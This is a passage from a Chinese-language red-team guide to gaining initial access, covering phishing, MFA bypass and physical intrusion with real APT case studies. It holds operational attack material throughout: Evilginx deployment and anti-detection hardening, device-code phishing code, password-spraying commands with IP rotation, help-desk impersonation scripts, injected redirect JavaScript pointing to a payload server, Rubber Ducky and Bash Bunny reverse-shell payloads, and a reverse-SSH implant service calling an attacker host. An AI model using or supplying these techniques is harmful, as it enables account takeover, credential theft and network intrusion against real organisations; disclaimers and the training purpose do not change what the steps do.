文章总结： 本文是一份红队初始访问的实战指南，系统阐述了在严密防御下建立目标立足点的技术与策略。核心内容覆盖从Payload开发（DLLSideloading、ShellcodeLoader、HTMLSmuggling）到多种攻击向量（钓鱼、MFA绕过、凭据攻击、供应链攻击）的完整攻击链，并深度结合APT29、LazarusGroup等组织的真实案例进行分析，映射MITREATT&CK框架，为红队行动提供了高度可操作的技术参考。 综合评分： 90 文章分类： 红队,渗透测试,内网渗透,威胁情报,实战经验

---

常见的 Quishing 话术：

• “扫码重新注册您的 MFA” (IT 部门)
• “扫码查看您更新的薪酬方案” (HR)
• “扫码访问共享文档” (内部团队)
• “Wi-Fi 已更新——扫码重新连接” (物理 QR 码海报)

实战案例：Microsoft 报告称，在整个 2024 年QR 码钓鱼大幅增加，攻击行动伪装成 Microsoft 365 MFA 注册流程。QR 码重定向到 AitM 页面以捕获会话令牌。部分行动将 Quishing 与 PDF 附件相结合——PDF 中包含 QR 码，为邮件扫描器增加了一层额外的混淆。

Microsoft Teams 钓鱼 (T1566.003)

Microsoft Teams 默认允许来自外部租户的消息。威胁行为者利用这一点通过 Teams 聊天投递钓鱼链接和 Payload——完全绕过邮件安全。

Midnight Blizzard (APT29)在 2023 年中期发起了一场大规模行动，使用被入侵的 Microsoft 365 租户并将其重命名为 “Microsoft Identity Protection” 或 “Microsoft Account Security”。他们向目标组织发送包含 Device Code Phishing 链接的 Teams 消息——受害者在 Teams 聊天中看到的是一条看似合法的 Microsoft 安全通知。

为什么 Teams 钓鱼有效：

• 完全绕过邮件网关

  ——消息通过 Teams 发送，而非 SMTP

• 外部租户消息显示一个“外部”徽标，大多数用户会忽略它

• Teams 消息比邮件感觉更紧急和个人化

• 通过 Teams 共享文件

  可以投递 Payload——OneDrive/SharePoint 链接绕过传统扫描

攻击流程：

1. Register or compromise a Microsoft 365 tenant
2. Rename tenant to impersonate IT/Security (e.g., "Help Desk Support")
3. Send Teams message to target with phishing link or device code
4. Target sees message in Teams → clicks link → credentials captured

| 工具 | 用途 | | — | — | | TeamsPhisher | 向外部 Teams 租户发送钓鱼消息 |

# TeamsPhisher  Send phishing messages to external Teams users
python3 teamsphisher.py -u [email protected] -p 'Password123' -a payload.html -m "Please review this security update" -l targets.txt

OPSEC 提示：Microsoft 在 2023 年底增加了限制外部 Teams 消息的功能，但大多数组织仍然默认允许。在投入时间开发此攻击向量之前，先确认目标是否阻止了外部租户通信。

使用 GoPhish 进行钓鱼行动管理

GoPhish 管理完整的钓鱼行动生命周期——邮件模板、目标列表、发送配置、落地页和实时追踪：

# Install GoPhish
wget https://github.com/gophish/gophish/releases/latest/download/gophish-linux-64bit.zip
unzip gophish-linux-64bit.zip &&cd gophish
chmod +x gophish && ./gophish

| 组件 | 用途 | | — | — | | Sending Profile | SMTP 服务器配置 (你的邮件服务器) | | Email Template | 钓鱼邮件正文和头部 | | Landing Page | 链接将受害者引导至的页面 (凭据捕获) | | Target Group | 目标邮箱地址列表 | | Campaign | 将所有组件关联在一起，追踪打开/点击/提交 |

第三阶段：中间人攻击 (AitM) 与 MFA 绕过

AitM Attack Flow

AitM 攻击流程：Evilginx 代理真实登录页面，同时捕获凭据和会话令牌，完全绕过 MFA

MFA 不再是不可逾越的障碍。现代 AitM 框架实时代理真实登录页面，同时捕获密码和已认证的会话令牌——完全绕过 MFA。

ALPHV/BlackCat 的附属组织使用 Evilginx2获取 MFA 凭据、登录凭据和会话 Cookie，用于他们针对 Change Healthcare 入侵事件(2024 年 2 月) 的攻击行动——美国历史上最大的医疗数据泄露事件，泄露了超过 1 亿条记录。

AitM 的工作原理

1. Victim clicks phishing link → lands on Evilginx
2. Evilginx serves the REAL Microsoft login page (proxied in real-time)
3. Victim enters credentials → Evilginx captures them → forwards to Microsoft
4. Microsoft sends MFA prompt → Victim approves → session token issued
5. Evilginx captures the session token (cookie)
6. Attacker uses the session token to access the account  NO MFA required

Evilginx 部署

Evilginx 是 AitM 钓鱼的行业标准工具。它同时捕获凭据和会话 Cookie：

# Install Evilginx
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2 && make
sudo ./bin/evilginx -p ./phishlets

# Configure domain and IP
config domain yourdomain.com
config ipv4 YOUR_SERVER_IP

# Load Office 365 phishlet
phishlets hostname o365 login.yourdomain.com
phishlets enable o365

# Create lure URL
lures create o365
lures get-url 0

诱饵 URL (例如 https://login.yourdomain.com/XkRjHmNp) 就是放入钓鱼邮件中的链接。

Evilginx OPSEC 加固

永远不要直接暴露 Evilginx。在其前方部署 Cloudflare 和反向代理：

Victim → Cloudflare (WAF + Bot Protection) → Caddy/Nginx → Tailscale VPN → Evilginx

关键 OPSEC 步骤：

1. 修改默认指纹

   ——Evilginx 默认使用 8 个大小写混合字符的 URL 路径。自定义它们。

2. 替换默认证书

   ——默认证书的 Organization: "Evilginx Signature Trust Co."。使用 Let’s Encrypt 或 Cloudflare 证书。

3. Cloudflare Cookie 门控

   ——阻止没有特定 Cookie 的直接访问，防止扫描器发现 Evilginx。

4. 域名年龄

   ——你的钓鱼域名需要有一定年龄。新域名 + Let’s Encrypt 证书 = 即刻红旗。

5. IP 轮换

   ——不要将 Evilginx 服务器 IP 用于任何其他基础设施组件。

# Cloudflare WAF Rule  Block direct access without cookie
Rule: (http.host eq "login.yourdomain.com") and (not http.cookie contains "session_ref=abc123")
Action: Block

检测注意事项：默认情况下，Evilginx 诱饵 URL 的路径是 8 个大小写混合字母。它创建的证书 Organization: "Evilginx Signature Trust Co."，CommonName: "Evilginx Super-Evil Root CA"。Evilginx Phishlet 框架已被 APT 行为者使用，包括 Storm-0485和 Star Blizzard——务必修改这些默认值。

Device Code Phishing (OAuth 滥用)

Device Code Phishing 是 2025-2026 年的新兴技术。它滥用 Microsoft 的 OAuth 2.0 设备授权授予流程——受害者在合法的 Microsoft 登录页面上输入一个代码，攻击者就能获得持久的访问令牌。

Star Blizzard (SEABORGIUM/COLDRIVER)——一个俄罗斯间谍行为者——在 2025 年全年广泛使用 Device Code Phishing 攻击 NATO 盟国、政府官员和智库。该技术此前仅限于小规模的红队演练，但到 2025 年 9 月，已观察到来自多个威胁行为者的大规模行动，包括 Storm-2372和 UNK_AcademicFlare。

为什么破坏力极大：

• 受害者在真正的 Microsoft 页面上认证——没有任何可疑之处

• 完全绕过 MFA

  ——令牌包含 MFA 声明，即使用户是被社工诱骗的

• 给予攻击者持久访问权限——令牌可以持续数天/数周

• 无需钓鱼页面

  ——没有会被烧毁的基础设施

攻击流程：

1. Attacker generates a device code via Microsoft's OAuth endpoint
2. Attacker sends email: "Enter this code to verify your identity"
3. Victim visits https://microsoft.com/devicelogin (REAL Microsoft page)
4. Victim enters the code and authenticates (including MFA)
5. Microsoft issues an access token to the ATTACKER's session
6. Attacker now has full access to victim's M365 account

工具：

| 工具 | 用途 | | — | — | | TokenTactics | Device Code Phishing、M365 令牌操纵 | | SquarePhish | 自动化 Device Code Phishing，支持 QR 码 | | OAuthSeeker | 用于 Initial Access 和横向移动的 OAuth 钓鱼 |

# Generate device code using Microsoft Graph API
import requests

tenant_id ="common"
client_id ="d3590ed6-52b3-4102-aeff-aad2292ab01c"# Microsoft Office client ID

response = requests.post(
    f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/devicecode",
data={
"client_id": client_id,
"scope": "https://graph.microsoft.com/.default offline_access"
    }
)

data = response.json()
print(f"User Code: {data['user_code']}")
print(f"Verification URI: {data['verification_uri']}")

# Poll for token (after victim authenticates)
# The device_code is used to poll until the user completes auth

OPSEC 提示：Device Code 在 15 分钟后过期。发送包含代码的钓鱼邮件，并准备好轮询脚本。返回的令牌包含 amr: ["mfa"]声明——仅检查 MFA 标志的防御措施会认为这是一个合法的 MFA 认证会话。

第四阶段：凭据攻击

有时你根本不需要 Payload。如果你能获取有效凭据，就可以从正门走进去——VPN、OWA、Microsoft 365、Citrix，以及任何暴露的门户。

Change Healthcare 入侵事件 (2024 年 2 月)：ALPHV/BlackCat 的附属组织使用窃取的凭据登录了一个未启用 MFA 的 Citrix 远程访问门户获得了初始访问权限。九天后，他们部署了勒索软件。此次入侵泄露了超过 1 亿份患者记录——美国历史上最大的医疗数据泄露事件。一个缺失的 MFA 配置导致了 2200 万美元的赎金支付。

密码喷洒 (T1110.003)

密码喷洒尝试用一个密码测试多个账户，而非用多个密码测试一个账户。这避免了账户锁定策略，同时仍能找到最薄弱的环节。

常用喷洒密码：

• Season+Year!

  → Winter2026!、Spring2026!

• CompanyName+123!

  → Target123!

• Welcome1!

  、Password1!、Changeme1!

• 基于事件 → SuperBowl2026!、Olympics2026!

工具：

| 工具 | 用途 | | — | — | | o365spray | O365 用户枚举和密码喷洒 | | CredMaster | 通过 AWS API Gateway IP 轮换进行喷洒 | | MSOLSpray | Microsoft Online (Azure AD) 密码喷洒 | | TREVORspray | 基于 SOCKS 的分布式喷洒 | | SprayingToolkit | 对 OWA、Lync、Office 365 进行喷洒 |

# O365 password spray with user enumeration
o365spray --enum -U users.txt -d target.com          # Enumerate valid users first
o365spray --spray -U valid_users.txt -P passwords.txt -d target.com  # Spray valid users

# CredMaster through AWS API Gateway (IP rotation)
credmaster --plugin o365 -u users.txt -p 'Winter2026!' --access_key AWS_KEY --secret_access_key AWS_SECRET --region us-east-1

# MSOLSpray
Invoke-MSOLSpray -UserList .\users.txt -Password "Winter2026!" -Verbose

时序与 OPSEC：

• 喷洒间隔至少每小时一个密码——大多数锁定策略为 30 分钟内 5-10 次尝试
• 使用 IP 轮换(CredMaster、fireprox、TREVORspray 配合 SOCKS 代理)
• 在非工作时间发起攻击——减少用户注意到登录失败通知的可能性
• 先进行用户枚举——只对已确认的有效账户进行喷洒

OPSEC 提示：使用 fireprox 为每次喷洒尝试创建 AWS API Gateway 代理。每个请求来自不同的 IP，从而击败速率限制和地理封锁。

凭据填充 (T1110.004)

测试泄露的凭据是否可用于目标的外部服务。许多用户会重复使用密码或使用可预测的变体：

# Test breach credentials against O365
credmaster --plugin o365 -c breached_creds.txt --access_key AWS_KEY --secret_access_key AWS_SECRET

如果泄露数据显示 john.smith:Summer2023!，尝试 Winter2025!、Summer2025!、Spring2026!等变体。

第五阶段：利用公网应用 (T1190)

28.7% 的初始入侵来自于利用公网 Web 应用。当目标暴露了存在漏洞的服务时，何必费力钓鱼，直接走进去即可。

Cl0p 与 MOVEit (2023 年 5 月)：从 2023 年 5 月 27 日起，Cl0p 勒索软件组织利用 Progress Software 的 MOVEit Transfer 中的 Zero-day SQL 注入漏洞 (CVE-2023-34362)。他们部署了名为 LEMURLOOT的定制 Web Shell (伪装为 human2.aspx) 从底层数据库中窃取数据。全球超过 8,000 个组织被入侵。CISA 估计有 3,000 多个美国实体受到影响。没有部署勒索软件——Cl0p 直接进行数据窃取和勒索。

高价值目标

这些服务在存在漏洞时是 Initial Access 的金矿：

| 服务 | 常见 CVE | 影响 | | — | — | — | | Citrix NetScaler/ADC | CVE-2023-3519、CVE-2023-4966 (CitrixBleed) | RCE、会话劫持 | | Fortinet FortiGate | CVE-2024-21762、CVE-2023-27997 | RCE、预认证 | | Ivanti Connect Secure | CVE-2024-21887、CVE-2023-46805 | 认证绕过 + RCE 链 | | PulseSecure VPN | CVE-2021-22893 | 认证绕过、RCE | | Microsoft Exchange | ProxyShell、ProxyLogon、ProxyNotShell | RCE、预认证 | | Confluence | CVE-2023-22527、CVE-2023-22515 | RCE、管理员创建 | | MOVEit Transfer | CVE-2023-34362 | SQLi → Web Shell → 数据窃取 | | VMware vCenter | CVE-2023-34048、CVE-2021-22005 | RCE |

漏洞利用工作流

# Discover all exposed web services
httpx -l subdomains.txt -title -tech-detect -status-code -content-length -o web_services.txt

# Scan for known vulnerabilities
nuclei -l live_hosts.txt -severity critical,high -t cves/ -o critical_vulns.txt

# Check for specific high-value targets
nuclei -l live_hosts.txt -t http/technologies/vpn/ -o vpn_detected.txt

OPSEC 提示：利用公网应用是高噪音行为。与钓鱼不同，它会生成日志、WAF 告警和 IDS 签名。使用慢速扫描、轮换 IP，并准备好触发告警后的应对方案。

第六阶段：语音钓鱼 (Vishing) 与基于语音的社会工程

语音钓鱼 (Vishing) 现在已成为主要的 Initial Access 向量。以经济利益为驱动的组织如 Scattered Spider使用 Vishing 攻击 Help Desk 以重置凭据和 MFA——导致了近年来最具破坏性的几起入侵事件。

Scattered Spider 对 MGM 和 Caesars 的攻击 (2023 年)：Scattered Spider 通过社会工程手段欺骗 MGM Resorts 的 IT Help Desk 人员，让他们为攻击者通过凭据钓鱼和历史信息窃取器泄露获得的账户重置凭据和 MFA。他们专门针对在 MGM 的 Okta 租户中拥有 Super Administrator 权限的账户，然后通过入站联合注册了第二个由攻击者控制的身份提供商——使他们能够冒充任何用户。

此次攻击给MGM 造成了超过 1 亿美元的损失，据报道 Caesars 支付了 1500 万美元赎金。他们的工具箱包括 SIM Swapping、推送轰炸 (MFA 疲劳攻击)、Vishing 和从暗网市场购买凭据。

为什么 Vishing 有效

• Help Desk 员工被训练为提供帮助，而非审问来电者

• 语音通话制造紧迫感——比邮件更难实时验证

• 无需绕过邮件安全

  ——没有网关、沙箱、链接扫描

• 通过深度 OSINT，你可以令人信服地冒充特定员工

攻击场景

场景 1：Help Desk 密码重置

Call target's IT help desk
"Hi, this is [Employee Name] from [Department].
I'm locked out of my account and I'm on deadline for [Project].
My manager [Manager Name] said to call you directly.
Can you reset my password? My employee ID is [OSINT'd ID]."

场景 2：MFA 重置

"I got a new phone and my authenticator app isn't working.
I need to re-enroll MFA. Can you help me set it up?"

场景 3：回拨钓鱼 (混合方式)

Email: "Your subscription will be charged $499.99. Call 1-800-XXX-XXXX to cancel."
Victim calls → Attacker guides them to install "support software" (your payload)

AI 增强的 Vishing

Google Cloud / Mandiant 已记录到 AI 驱动的语音伪造越来越多地用于 Vishing 攻击。AI 语音克隆现在只需几分钟的音频 (来自会议演讲、YouTube 视频、播客) 就能模仿特定个人。在过去一年中，AI 驱动的 Vishing 攻击增加了 60%。

| 工具 | 用途 | | — | — | | ElevenLabs | 高质量语音克隆和文本转语音 | | VALL-E / RVC | 开源语音克隆模型 |

OPSEC 提示：录制所有 Vishing 通话 (需在授权范围文件中获得适当的法律授权)。这为你的报告提供证据，并防止争议。

第七阶段：水坑攻击与 Drive-by 入侵 (T1189)

与其主动攻击目标，不如让目标主动来找你。入侵目标经常访问的网站，将其武器化。

水坑攻击流程

1. Identify websites target employees visit (industry forums, news sites)
2. Compromise the website (XSS, CMS exploit, supply chain)
3. Inject exploit kit or redirect script
4. Target visits the site → browser exploit fires → payload delivered
5. Only targets matching your criteria get exploited (IP range, user-agent, geo-IP)

选择性定向攻击

只对预期目标触发你的利用代码——其他人看到的是正常网站：

// Injected into compromised website
(function() {
fetch('https://api.ipify.org?format=json')
.then(r=>r.json())
.then(data=> {
vartargetRanges= ['203.0.113.', '198.51.100.'];
varisTarget=targetRanges.some(r=>data.ip.startsWith(r));
if (isTarget) {
window.location='https://your-payload-server.com/deliver';
            }
        });
})();

| 工具 | 用途 | | — | — | | BeEF | Browser Exploitation Framework——Hook 浏览器、执行攻击 | | Metasploit Browser Exploits | 基于 CVE 的浏览器漏洞利用模块 |

OPSEC 提示：水坑攻击是高风险、高回报的操作。如果被入侵的网站发现了你的注入代码，可能会通知目标。仅在其他攻击向量都用尽后再使用此技术。

第八阶段：物理访问与硬件 (T1200)

当数字攻击向量全部被封锁时，转向物理手段。USB 投放、恶意设备和硬件植入可以绕过所有数字防御。

FIN7 BadUSB 攻击 (2022 年)：FIN7 向美国组织邮寄伪造的 BestBuy Geek Squad 包裹，其中包含武器化的 USB Rubber Ducky 设备。包裹附带”礼品卡”和插入 USB 设备的说明。一旦插入，USB 会注入按键来下载并执行后门——整个过程仅需几秒钟。这是有记录的 APT 级别大规模物理 Initial Access 案例。

USB 投放攻击 (T1091)

在目标区域留下武器化的 USB 驱动器——停车场、大厅、休息室。人类的好奇心会完成剩下的工作。

USB Rubber Ducky:

USB Rubber Ducky 外观像普通 U 盘，但功能相当于键盘。它以超人速度注入按键：

REM Rubber Ducky payload  Reverse shell in 3 seconds
DELAY 1000
GUI r
DELAY 500
STRING powershell -ep bypass -w hidden -e BASE64_ENCODED_REVERSE_SHELL
ENTER

| 设备 | 能力 | 隐蔽性 | 价格 | | — | — | — | — | | USB Rubber Ducky | 按键注入 | 高 (外观像 USB) | ~$80 | | Bash Bunny | 多向量 (HID + 存储 + 以太网) | 高 | ~$120 | | LAN Turtle | 网络植入设备 (SSH、DNS 等) | 高 (内联) | ~$60 | | O.MG Cable | 通过 USB 线缆注入按键 | 非常高 (外观像充电线) | ~$180 |

Bash Bunny——复制并执行 Payload：

Bash Bunny 比 Rubber Ducky 更强大——它可以同时充当键盘 (HID) 和存储设备。这意味着它可以输入引用自身存储文件的命令：

# Bash Bunny payload  Copy beacon from Bunny storage and execute
# File: payloads/switch1/payload.txt

ATTACKMODE HID STORAGE
LED SETUP
DELAY 2000

# Open PowerShell hidden
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000

# Detect Bash Bunny drive letter and copy payload
STRING $bunny = (Get-Volume -FileSystemLabel 'BashBunny').DriveLetter
ENTER
DELAY 500
STRING Copy-Item "${bunny}:\tools\beacon.exe""C:\Windows\Tasks\svchost.exe"
ENTER
DELAY 500
STRING Start-Process "C:\Windows\Tasks\svchost.exe"
ENTER

LED FINISH

注意：Bash Bunny 通过 PowerShell 动态检测自身的驱动器盘符——无需硬编码路径。Payload 将 Beacon 复制到可写的系统目录并执行。从插入到获得 Shell 的总时间：不到 5 秒。

恶意网络设备

在目标的物理网络上植入设备以创建持久后门：

# Raspberry Pi  Auto-connect reverse SSH tunnel on boot
# /etc/systemd/system/reverse-tunnel.service
[Unit]
Description=Reverse SSH Tunnel
After=network-online.target

[Service]
ExecStart=/usr/bin/ssh -N -R 4444:localhost:22 [email protected] -o ServerAliveInterval=60
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target

OPSEC 提示：物理访问操作需要在你的行动准则 (Rules of Engagement) 中获得明确的书面授权。务必随身携带授权范围函。

第九阶段：供应链与可信关系

最复杂的 Initial Access 技术——入侵目标已经信任的东西。

供应链攻击 (T1195)

Lazarus Group——双重供应链攻击 (2023 年)：这是历史上首次有记录的双重供应链攻击之一。Lazarus Group 首先入侵了 Trading Technologies 的 X_TRADER应用程序 (一个 2020 年已停用但仍可下载的金融交易平台)。他们注入了 VEILEDSIGNAL后门——一个多阶段模块化后门，能够执行 Shellcode、将 C2 模块注入 Chrome/Firefox/Edge，并自行终止。

一名 3CX 员工下载了被木马化的 X_TRADER。Lazarus 利用获得的访问权限窃取凭据、横向移动，并入侵了 3CX 的 Windows 和 macOS 构建系统。他们将恶意代码注入 3CX 的官方软件更新——随后分发给了数千个组织。一次供应链攻击催生了第二次供应链攻击。

Midnight Blizzard——SolarWinds SUNBURST (2020 年)：俄罗斯 SVR (APT29/Nobelium) 入侵了 SolarWinds 的构建流水线，并将 SUNBURST后门注入 SolarWinds.Orion.Core.BusinessLayer.dll——一个合法签名的组件。超过 18,000 个组织安装了恶意更新 (版本 2019.4 至 2020.2.1 HF1)。SUNBURST 有 2 周的潜伏期，随后解析 avsvmcloud[.]com子域名进行 C2 通信。

它使用黑名单检测取证工具，将流量伪装为 Orion Improvement Program (OIP)，并通过 TEARDROP和 Raindrop加载器投递 Cobalt Strike。目标包括美国政府机构 (DHS、国务院、商务部、财政部) 和 Fortune 500 公司。

供应链攻击向量：

• 木马化软件更新

  ——入侵供应商的构建流水线，推送恶意更新

• 被入侵的开源包

  ——在 npm/PyPI/NuGet 包中注入恶意代码

• SEO 投毒

  ——将虚假下载页面排在合法页面之上，提供木马化安装程序 (已记录有伪造的 PuTTY、Teams 和其他流行工具的案例)

Legitimate search result:  "Download PuTTY" → putty.org
Attacker's result:         "Download PuTTY" → putty-download.com (SEO poisoned)
                            → Serves trojanized PuTTY with embedded backdoor

可信关系 (T1199)

滥用第三方供应商、MSP 或合作伙伴对目标环境的访问权限：

| 关系 | 访问级别 | 攻击示例 | | — | — | — | | MSP (托管服务提供商) | 对客户环境的管理员访问权限 | 入侵 MSP → 横向移动至所有客户 | | 软件供应商 | 更新机制、API 访问 | 木马化更新 (SolarWinds、3CX) | | 云提供商合作伙伴 | 共享租户、SSO | 滥用联合身份信任 (Scattered Spider / Okta) | | 承包商/顾问 | VPN、远程桌面访问 | 凭据窃取、无 MFA 的 Citrix (Change Healthcare) |

注意：在红队行动中进行供应链攻击需要非常谨慎的授权范围界定。通常是模拟这些攻击，而非真正入侵第三方供应商。

选择攻击向量——决策矩阵

Decision Matrix

根据目标环境特征沿决策树判断，选择最优的 Initial Access 向量

                        ┌─── Exposed services found?
                        │
                  ┌─────┴─────┐
                  │ Yes       │ No
                  │           │
          ┌───────┴───┐    ┌──┴──────────┐
          │ Exploit    │    │ Target has  │
          │ Public-    │    │ MFA?        │
          │ Facing App │    └──┬──────────┘
          └───────────┘       │
                        ┌─────┴─────┐
                        │ Yes       │ No
                        │           │
                ┌───────┴───┐    ┌──┴──────────┐
                │ Evilginx  │    │ GoPhish     │
                │ AitM       │    │ Credential  │
                │ Device Code│    │ Harvesting  │
                └───────────┘    └─────────────┘

如果所有数字攻击向量都失败：物理访问 (USB 投放、恶意设备)、语音钓鱼 (Help Desk 攻击) 或水坑攻击。

Initial Access 工具集

Payload 开发

| 工具 | 用途 | 链接 | | — | — | — | | PackMyPayload | MOTW 绕过容器 (ISO/VHD/IMG) | GitHub | | HTMLSmuggler | 带混淆的 HTML Smuggling | GitHub | | MetaTwin | 二进制元数据和签名克隆 | GitHub | | ScareCrow | 带 Syscall 的 EDR 绕过 Loader 生成 | GitHub | | Freeze | EDR 绕过 Payload 创建 | GitHub | | SysWhispers3 | Direct/Indirect Syscall 存根生成 | GitHub | | HellsGate | 运行时系统调用号解析 | GitHub | | Havoc C2 | 带原生规避能力的现代 C2 框架 | GitHub |

钓鱼与社会工程

| 工具 | 用途 | 链接 | | — | — | — | | GoPhish | 钓鱼行动管理 | GitHub | | Evilginx | AitM 反向代理、MFA 绕过 | GitHub | | TokenTactics | Device Code Phishing、M365 令牌滥用 | GitHub | | SquarePhish | OAuth Device Code Phishing | GitHub | | OAuthSeeker | 用于 Initial Access 的 OAuth 钓鱼 | GitHub | | TeamsPhisher | 外部 Teams 租户钓鱼 | GitHub |

凭据攻击

| 工具 | 用途 | 链接 | | — | — | — | | o365spray | O365 用户枚举和密码喷洒 | GitHub | | CredMaster | IP 轮换凭据喷洒 | GitHub | | MSOLSpray | Azure AD 密码喷洒 | GitHub | | TREVORspray | 分布式密码喷洒 | GitHub | | fireprox | AWS API Gateway IP 轮换 | GitHub |

漏洞利用

| 工具 | 用途 | 链接 | | — | — | — | | Nuclei | 基于模板的漏洞扫描 | GitHub | | httpx | HTTP 探测和技术检测 | GitHub | | feroxbuster | 快速内容发现 | GitHub |

物理访问

| 工具 | 用途 | 链接 | | — | — | — | | USB Rubber Ducky | 按键注入 | Hak5 | | Bash Bunny | 多向量 USB 植入设备 | Hak5 | | O.MG Cable | 隐蔽 USB 线缆植入设备 | Hak5 | | LAN Turtle | 内联网络植入设备 | Hak5 |

---

感谢阅读——Initial Access 决定了行动的成败。最好的基础设施、最先进的 C2、最干净的持久化——如果你无法获得初始立足点，一切都毫无意义。构建能绕过现代防御的 Payload，打造令人必点的话术，并始终准备好备用方案。

本指南涵盖 9 个阶段：Payload 开发 (MOTW 绕过、HTML Smuggling、签名、DLL Sideloading、Shellcode Loader)、钓鱼与鱼叉式钓鱼 (QR 码钓鱼、Teams 钓鱼)、中间人攻击与 MFA 绕过 (Evilginx、Device Code Phishing)、凭据攻击 (密码喷洒、凭据填充)、利用公网应用、语音钓鱼与语音社会工程、水坑攻击与 Drive-by 入侵、物理访问与硬件植入 (Rubber Ducky、Bash Bunny)、供应链与可信关系——全部以真实 APT 案例研究为支撑。

敬请期待更多内容。

参考文献

1. MITRE ATT&CK

   TA0001 Initial Access The authoritative framework mapping all initial access techniques.

2. Mandiant / Google Cloud

   APT29 Uses WINELOADER to Target German Political Parties APT29’s HTML smuggling + DLL sideloading campaigns.

3. Zscaler ThreatLabz

   WINELOADER Analysis Technical deep dive into APT29’s WINELOADER backdoor.

4. CISA

   Scattered Spider Advisory TTPs including SIM swapping, vishing, Okta exploitation.

5. Mandiant

   Lazarus and the 3CX Double Supply Chain Attack X_TRADER → 3CX attack chain.

6. CISA

   CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability MOVEit mass exploitation analysis.

7. CISA

   ALPHV/BlackCat Ransomware Initial access via social engineering, Evilginx, and Citrix exploitation.

8. Mandiant / FireEye

   SolarWinds SUNBURST Supply Chain Attack SUNBURST backdoor analysis.

9. Proofpoint

   Access Granted: Phishing with Device Code Authorization Star Blizzard device code phishing campaigns.

10. Sophos

    Stealing User Credentials with Evilginx AitM attack technical analysis.

11. Google Cloud / Mandiant

    AI-Powered Voice Spoofing for Vishing Attacks AI-enhanced vishing analysis.

12. CISA

    Red Team Assessment of US Critical Infrastructure Real-world red team initial access findings.

13. Red Canary

    Threat Detection Report: Initial Access Trends Data-driven initial access analysis.

14. Outflank

    Mark-of-the-Web from a Red Team’s Perspective MOTW bypass techniques.

15. mgeeky

    PackMyPayload MOTW-bypassing container generation.

16. D00Movenok

    HTMLSmuggler HTML smuggling generator with obfuscation.

17. Hak5

    USB Rubber Ducky Hardware keystroke injection platform.

18. Picus Security

    Tracking Scattered Spider Through Identity Attacks Scattered Spider TTP analysis.

19. Lorenzo Meacci

    Advanced Initial Access Techniques DLL sideloading discovery with Process Monitor, shellcode loading, Bash Bunny payloads.

20. Microsoft

    Midnight Blizzard Conducts Targeted Social Engineering via Microsoft Teams Teams-based phishing campaigns.

21. Microsoft

    QR Code Phishing Campaigns Targeting Users QR code phishing (quishing) trends and detection.

22. klezVirus

    SysWhispers3 Direct and indirect syscall generation for EDR evasion.

23. HavocFramework

    Havoc C2 Modern command and control framework with native evasion capabilities.

---

免责声明：本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：securitainment DbgMan DbgMan《初始访问：突破的艺术》